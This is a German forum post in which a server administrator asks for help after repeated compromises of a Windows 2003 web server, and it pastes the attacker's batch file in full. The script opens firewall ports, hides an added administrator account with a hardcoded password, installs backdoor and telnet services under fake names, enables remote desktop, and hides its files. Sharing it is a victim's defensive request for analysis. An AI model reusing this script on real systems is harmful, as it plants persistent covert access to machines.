Server gehackt, bzw. manipuliert - finde die Lücke nicht!

Hallo Admins und ITler,

einer unserer Webserver wurde heute Abend schon wieder von fremder Hand manipuliert und missbraucht
Zum Glück haben die spät angefangen, somit sind nur 15 GB verbraucht worden, bis ich es gemerkt habe.

Es ist nun schon des öfteren passiert und leider immer auf die selbe Art:

In c:\windows\Temp liegt eine batchdatei, die anscheined ausgeführt wird und den Server richtig schön umkonfiguriert.
Ich habe die letzten Male alle enthaltenen Schritte rückgängig gemacht, aber eine Woche später war alles wieder verändert.

Wie beschrieben handelt es sich um einen Webserver (Windows 2003 Web Edition SP2 alle Updates installiert)
Auf den Ordner TEMP haben Admins Vollzugriff, Authentifizierte Benutzer Leserechte, Netzwerkdienst Dateischreib-, lese,- ausführrechte (ASP.NET) und System mit Vollzugriff.

Was kann ich tun, was habe ich übersehen, braucht Ihr mehr Infos?

Ich hoffe ich darf den Inhalt dieser Datei hier posten, sonst bitte sofort löschen und ich schicke den Inhalt per Mail an Interessierte.

@echo OFF

mkdir %windir%\system32\spool
mkdir %windir%\system32\spool\drivers
mkdir %windir%\system32\spool\drivers\w32x86
mkdir %windir%\system32\dllcache
mkdir %windir%\system32\config
mkdir %windir%\system32\spool\drivers\w32x86\ddemsn
mkdir %windir%\system32\PreInstall
mkdir %windir%\system32\PreInstall\IMAP

move iplist.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move psinfo.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move test.bat %windir%\system32\spool\drivers\w32x86\ddemsn
move uptime.exe %windir%\system32\spool\drivers\w32x86\ddemsn
move secured.exe %windir%\system32\spool\drivers\w32x86\ddemsn

move inf.ocx %windir%\system32

move localsrv.sav %windir%\system32\config
move jasfv.dll %windir%\system32\PreInstall\IMAP
move jasfv.ini %windir%\system32\PreInstall\IMAP
move ibcserv.exe %windir%\system32\PreInstall\IMAP
move imapservice.dll %windir%\system32\PreInstall\IMAP
move filter.ini %windir%\system32\PreInstall\IMAP
move filter.dll %windir%\system32\PreInstall\IMAP
move spooler.exe %windir%\system32\spool

::add firewall exceptions
echo Windows Registry Editor Version 5.00>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]>>firewall.reg
echo "%%windir%%\\system32\\qttask.exe"="%%windir%%\\system32\\preinstall\\imap\\ibcserv.exe:*:Enabled">>firewall.reg
echo. >>firewall.regecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]>>firewall.reg
echo "%%windir%%\\system32\\qttask.exe"="%%windir%%\\system32\\preinstall\\imap\\ibcserv.exe:*:Enabled">>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]>>firewall.reg
echo "517:TCP"="517:TCP:*:Enabled">>firewall.reg
echo "1038:TCP"="1038:TCP:*:Enabled">>firewall.reg
echo "1138:TCP"="1138:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo "2000:TCP"="2000:TCP:*:Enabled">>firewall.reg
echo "2100:TCP"="2100:TCP:*:Enabled">>firewall.reg
echo "2200:TCP"="2200:TCP:*:Enabled">>firewall.reg
echo "2300:TCP"="2300:TCP:*:Enabled">>firewall.reg
echo "2400:TCP"="2400:TCP:*:Enabled">>firewall.reg
echo "2500:TCP"="2500:TCP:*:Enabled">>firewall.reg
echo "2600:TCP"="2600:TCP:*:Enabled">>firewall.reg
echo "2633:TCP"="2633:TCP:*:Enabled">>firewall.reg
echo "2634:TCP"="2634:TCP:*:Enabled">>firewall.reg
echo "2700:TCP"="2700:TCP:*:Enabled">>firewall.reg
echo "2701:TCP"="2701:TCP:*:Enabled">>firewall.reg
echo "2702:TCP"="2702:TCP:*:Enabled">>firewall.reg
echo "2703:TCP"="2703:TCP:*:Enabled">>firewall.reg
echo "2800:TCP"="2800:TCP:*:Enabled">>firewall.reg
echo "2801:TCP"="2801:TCP:*:Enabled">>firewall.reg
echo "2802:TCP"="2802:TCP:*:Enabled">>firewall.reg
echo "2900:TCP"="2900:TCP:*:Enabled">>firewall.reg
echo "3000:TCP"="3000:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo. >>firewall.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]>>firewall.reg
echo "517:TCP"="517:TCP:*:Enabled">>firewall.reg
echo "1038:TCP"="1038:TCP:*:Enabled">>firewall.reg
echo "1138:TCP"="1138:TCP:*:Enabled">>firewall.reg
echo "2000:TCP"="2000:TCP:*:Enabled">>firewall.reg
echo "2100:TCP"="2100:TCP:*:Enabled">>firewall.reg
echo "2200:TCP"="2200:TCP:*:Enabled">>firewall.reg
echo "2300:TCP"="2300:TCP:*:Enabled">>firewall.reg
echo "2400:TCP"="2400:TCP:*:Enabled">>firewall.reg
echo "2500:TCP"="2500:TCP:*:Enabled">>firewall.reg
echo "2600:TCP"="2600:TCP:*:Enabled">>firewall.reg
echo "2633:TCP"="2633:TCP:*:Enabled">>firewall.reg
echo "2634:TCP"="2634:TCP:*:Enabled">>firewall.reg
echo "2700:TCP"="2700:TCP:*:Enabled">>firewall.reg
echo "2701:TCP"="2701:TCP:*:Enabled">>firewall.reg
echo "2702:TCP"="2702:TCP:*:Enabled">>firewall.reg
echo "2703:TCP"="2703:TCP:*:Enabled">>firewall.reg
echo "2800:TCP"="2800:TCP:*:Enabled">>firewall.reg
echo "2801:TCP"="2801:TCP:*:Enabled">>firewall.reg
echo "2802:TCP"="2802:TCP:*:Enabled">>firewall.reg
echo "2900:TCP"="2900:TCP:*:Enabled">>firewall.reg
echo "3000:TCP"="3000:TCP:*:Enabled">>firewall.reg
echo "4589:TCP"="4589:TCP:*:Enabled">>firewall.reg
echo "4590:TCP"="4590:TCP:*:Enabled">>firewall.reg
echo. >>firewall.reg
regedit /s firewall.reg
del firewall.reg /Q

::start serv-u
%systemroot%\system32\PreInstall\IMAP\ibcserv.exe /i

::backdoor
start %windir%\system32\spool\spooler.exe

sca.exe config rpcapd displayname= "Imap Burn Control"
sca.exe description RAS "This service handles Imap Burn Controls sent by clients in your network. If this service is disabled, all services that depend on it, default: Remote Procedure Call (RPC), will fail to start. It is highly recommended to enable this service."
sca.exe config RpcSs depend= rpcapd
sca.exe config rpcapd error= ignore
sca.exe config rpcapd start= auto
sca.exe start rpcapd

::add/hide user
net1 user SUPPORT_27931a9 banana /add & Net1 Localgroup Administrators SUPPORT_27931a9 /add & reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList t" /v SUPPORT_27931a9 /t REG_DWORD /d 0

echo REGEDIT4 >> user.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts] >> user.reg
echo
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] >> user.reg
echo "SUPPORT_27931a9"=dword:00000000 >> user.reg

regedit /s user.reg
del user.reg

::add backdoor
xnet.exe install Ntf /b:%windir%\system32\tlntsvr.exe /n:"Network Interface" /i:no /s:auto
xnet.exe start Ntf
sca.exe start ntf
net start Ntf

::minor secure
sca.exe delete dntus26
sca.exe delete psexec
net share admin$ /del
net stop dntus26
net stop psexec

::enable TS
echo Windows Registry Editor Version 5.00 >> ts_on.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server] >> ts_on.reg
echo "TSEnabled"=dword:00000001 >> ts_on.reg
echo "TSUserEnabled"=dword:00000001 >> ts_on.reg
echo "fAllowToGetHelp"=dword:00000001 >> ts_on.reg
echo "fDenyTSConnections"=dword:00000000 >> ts_on.reg
regedit.exe /s "ts_on.reg"
del /f ts_on.reg

attrib %windir%\system32\PreInstall\IMAP\jasfv.dll +h
attrib %windir%\system32\PreInstall\IMAP\jasfv.ini +h
attrib %windir%\system32\PreInstall\IMAP\ibcserv.exe +h
attrib %windir%\system32\PreInstall\IMAP\imapservice.dll +h
attrib %windir%\system32\PreInstall\IMAP\filter.ini +h
attrib %windir%\system32\PreInstall\IMAP\filter.dll +h
attrib %windir%\system32\Preinstall +h
attrib %windir%\system32\Preinstall\IMAP +h
attrib %windir%\system32\spool\spooler.exe +h

%windir%\system32\spool\drivers\w32x86\ddemsn\test.bat
del %windir%\system32\spool\drivers\w32x86\ddemsn\test.bat
del sca.exe
del xnet.exe
del 389742.bat